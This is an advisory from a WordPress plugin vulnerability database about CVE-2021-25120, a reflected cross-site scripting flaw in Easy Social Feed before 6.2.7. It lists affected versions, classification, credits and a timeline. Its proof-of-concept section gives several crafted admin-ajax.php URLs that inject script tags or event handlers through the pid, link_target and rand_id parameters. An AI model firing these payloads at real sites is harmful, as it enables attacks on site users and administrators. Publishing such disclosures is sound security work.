WordPress Plugin Vulnerabilities

Easy Social Feed < 6.2.7 - Reflected Cross-Site Scripting

Description

The plugins do not sanitise some of their parameters used via AJAX actions before outputting them back in the response, leading to Reflected Cross-Site Scripting issues

Proof of Concept

Pro version:
https://example.com/wp-admin/admin-ajax.php?action=efbl_load_feed_popup&pid="><script>alert(2)</script> (Fixed in 6.2.5)
https://example.com/wp-admin/admin-ajax.php?action=efbl_load_feed_popup&pid="><script>alert(/XSS/)</script>&link_target="><script>alert(/XSS2/)</script> (Fixed in 6.2.5)
https://example.com/wp-admin/admin-ajax.php?action=efbl_load_feed_popup&pid=1&link_target=%22onmouseover=alert(/XSS2/)// (Fixed in 6.2.7)

Free version (< 6.2.7):
https://example.com/wp-admin/admin-ajax.php?action=efbl_generate_popup_html&rand_id=%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E (fixed in 6.2.7)

Affects Plugins

Plugin icon
easy-facebook-likebox-premium
Fixed in 6.2.7
Plugin icon
easy-facebook-likebox
Fixed in 6.2.7

References

CVE
CVE-2021-25120

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
7.1 (high)

Miscellaneous

Original Researcher
Thura Moe Myint
Submitter
mgthuramoemyint
Submitter twitter
mgthuramoemyint
Verified
Yes
WPVDB ID
0ad020b5-0d16-4521-8ea7-39cd206ab9f6

Timeline

Publicly Published
2021-08-12 (about 2 years ago)
Added
2022-03-24 (about 2 years ago)
Last Updated
2022-04-11 (about 2 years ago)

Other

Published
Title
Published
2021-12-27
Title
Orders Tracking for WooCommerce < 1.1.10 - Reflected Cross-Site Scripting
Published
2014-08-01
Title
silverOrchid <= 1.5.0 - XSS
Published
2024-03-01
Title
Master Slider <= 3.9.5 - Contributor+ Stored XSS
Published
2023-02-20
Title
Shipyaari Shipping Management <= 1.0 - Admin+ Stored XSS
Published
2021-12-02
Title
Post Duplicator < 2.27 - Admin+ Stored Cross-Site Scripting